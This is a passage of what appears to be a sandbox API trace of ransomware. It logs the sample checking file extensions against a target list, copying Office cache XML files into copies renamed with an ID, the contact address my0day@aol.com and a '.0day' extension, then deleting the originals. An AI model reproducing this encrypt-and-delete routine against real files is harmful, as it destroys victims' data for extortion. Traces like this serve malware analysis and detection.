returned -1 [0034.140] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.140] lstrlenW (lpString=".zip") returned 4 [0034.140] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.141] lstrlenW (lpString=".rar") returned 4 [0034.141] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString=".bz2") returned 4 [0034.141] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString=".7z") returned 3 [0034.141] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.141] lstrlenW (lpString=".dbf") returned 4 [0034.141] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.141] lstrlenW (lpString=".1cd") returned 4 [0034.141] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.141] lstrlenW (lpString=".jpg") returned 4 [0034.141] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.141] lstrlenW (lpString=".doc") returned 4 [0034.141] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString=".docx") returned 5 [0034.141] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.141] lstrlenW (lpString=".pdf") returned 4 [0034.141] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString=".xls") returned 4 [0034.141] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString=".xlsx") returned 5 [0034.141] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.141] lstrlenW (lpString=".ppt") returned 4 [0034.141] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.141] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.141] lstrlenW (lpString=".zip") returned 4 [0034.141] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.141] lstrlenW (lpString=".rar") returned 4 [0034.141] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.142] lstrlenW (lpString=".bz2") returned 4 [0034.142] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.142] lstrlenW (lpString=".7z") returned 3 [0034.142] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.142] lstrlenW (lpString=".dbf") returned 4 [0034.142] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.142] lstrlenW (lpString=".1cd") returned 4 [0034.142] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.142] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.142] lstrlenW (lpString=".jpg") returned 4 [0034.142] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.142] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.142] lstrlenW (lpString="WordMUI.xml") returned 11 [0034.142] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.142] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1800) returned 1 [0034.142] CloseHandle (hObject=0x184) returned 1 [0034.142] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020 [0034.142] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.143] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0034.143] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.143] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.143] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0034.143] GetLastError () returned 0x0 [0034.143] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x708, lpOverlapped=0x0) returned 1 [0034.303] WriteFile (in: hFile=0x190, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x710, lpOverlapped=0x0) returned 1 [0034.304] ReadFile (in: hFile=0x184, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.304] WriteFile (in: hFile=0x190, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0034.304] SetEndOfFile (hFile=0x190) returned 1 [0034.304] CloseHandle (hObject=0x190) returned 1 [0034.305] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.305] SetEndOfFile (hFile=0x184) returned 1 [0034.305] CloseHandle (hObject=0x184) returned 1 [0034.306] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.306] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0034.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.306] lstrlenW (lpString=".doc") returned 4 [0034.306] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.306] lstrlenW (lpString=".docx") returned 5 [0034.306] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.306] lstrlenW (lpString=".pdf") returned 4 [0034.306] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.306] lstrlenW (lpString=".xls") returned 4 [0034.306] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.306] lstrlenW (lpString=".xlsx") returned 5 [0034.306] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.306] lstrlenW (lpString=".ppt") returned 4 [0034.306] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.306] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.306] lstrlenW (lpString=".zip") returned 4 [0034.306] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.306] lstrlenW (lpString=".rar") returned 4 [0034.306] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.306] lstrlenW (lpString=".bz2") returned 4 [0034.306] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.306] lstrlenW (lpString=".7z") returned 3 [0034.307] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.307] lstrlenW (lpString=".dbf") returned 4 [0034.307] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.307] lstrlenW (lpString=".1cd") returned 4 [0034.307] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.307] lstrlenW (lpString=".jpg") returned 4 [0034.307] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.307] lstrlenW (lpString=".doc") returned 4 [0034.307] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString=".docx") returned 5 [0034.307] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.307] lstrlenW (lpString=".pdf") returned 4 [0034.307] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString=".xls") returned 4 [0034.307] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString=".xlsx") returned 5 [0034.307] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.307] lstrlenW (lpString=".ppt") returned 4 [0034.307] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.307] lstrlenW (lpString=".zip") returned 4 [0034.307] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.307] lstrlenW (lpString=".rar") returned 4 [0034.307] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString=".bz2") returned 4 [0034.307] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.307] lstrlenW (lpString=".7z") returned 3 [0034.308] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.308] lstrlenW (lpString=".dbf") returned 4 [0034.308] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.308] lstrlenW (lpString=".1cd") returned 4 [0034.308] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0034.308] lstrlenW (lpString=".jpg") returned 4 [0034.308] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.308] Sleep (dwMilliseconds=0x64) [0034.549] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.549] lstrlenW (lpString="Setup.xml") returned 9 [0034.549] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.681] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1852) returned 1 [0034.687] CloseHandle (hObject=0x188) returned 1 [0034.697] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.697] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.697] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.697] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.697] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.697] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.698] GetLastError () returned 0x0 [0034.698] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x73c, lpOverlapped=0x0) returned 1 [0034.818] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x740, lpOverlapped=0x0) returned 1 [0034.818] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.819] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.819] SetEndOfFile (hFile=0x198) returned 1 [0034.819] CloseHandle (hObject=0x198) returned 1 [0034.819] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.819] SetEndOfFile (hFile=0x188) returned 1 [0034.820] CloseHandle (hObject=0x188) returned 1 [0034.820] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.820] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.821] lstrlenW (lpString=".doc") returned 4 [0034.821] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString=".docx") returned 5 [0034.821] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.821] lstrlenW (lpString=".pdf") returned 4 [0034.821] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString=".xls") returned 4 [0034.821] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString=".xlsx") returned 5 [0034.821] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.821] lstrlenW (lpString=".ppt") returned 4 [0034.821] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.821] lstrlenW (lpString=".zip") returned 4 [0034.821] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.821] lstrlenW (lpString=".rar") returned 4 [0034.821] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString=".bz2") returned 4 [0034.821] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString=".7z") returned 3 [0034.821] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.821] lstrlenW (lpString=".dbf") returned 4 [0034.821] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.821] lstrlenW (lpString=".1cd") returned 4 [0034.821] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.821] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.821] lstrlenW (lpString=".jpg") returned 4 [0034.822] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.822] lstrlenW (lpString=".doc") returned 4 [0034.822] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString=".docx") returned 5 [0034.822] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.822] lstrlenW (lpString=".pdf") returned 4 [0034.822] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString=".xls") returned 4 [0034.822] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString=".xlsx") returned 5 [0034.822] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.822] lstrlenW (lpString=".ppt") returned 4 [0034.822] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.822] lstrlenW (lpString=".zip") returned 4 [0034.822] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.822] lstrlenW (lpString=".rar") returned 4 [0034.822] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString=".bz2") returned 4 [0034.822] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString=".7z") returned 3 [0034.822] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.822] lstrlenW (lpString=".dbf") returned 4 [0034.822] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.822] lstrlenW (lpString=".1cd") returned 4 [0034.822] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.822] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.822] lstrlenW (lpString=".jpg") returned 4 [0034.822] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.823] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.823] lstrlenW (lpString="OfficeMUI.xml") returned 13 [0034.823] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.823] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=5557) returned 1 [0034.823] CloseHandle (hObject=0x188) returned 1 [0034.823] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 0x2020 [0034.823] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.823] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.823] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.823] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.823] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0034.824] GetLastError () returned 0x0 [0034.824] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x15b5, lpOverlapped=0x0) returned 1 [0034.825] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x15c0, lpOverlapped=0x0) returned 1 [0034.826] ReadFile (in: hFile=0x188, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0034.826] WriteFile (in: hFile=0x198, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xee, lpOverlapped=0x0) returned 1 [0034.826] SetEndOfFile (hFile=0x198) returned 1 [0034.827] CloseHandle (hObject=0x198) returned 1 [0034.827] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0034.827] SetEndOfFile (hFile=0x188) returned 1 [0034.828] CloseHandle (hObject=0x188) returned 1 [0034.828] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.828] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml")) returned 1 [0034.828] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.828] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 76 [0034.828] lstrlenW (lpString=".doc") returned 4 [0034.828] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString=".docx") returned 5 [0034.829] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.829] lstrlenW (lpString=".pdf") returned 4 [0034.829] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString=".xls") returned 4 [0034.829] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.829] lstrlenW (lpString=".xlsx") returned 5 [0034.829] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.829] lstrlenW (lpString=".ppt") returned 4 [0034.829] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned 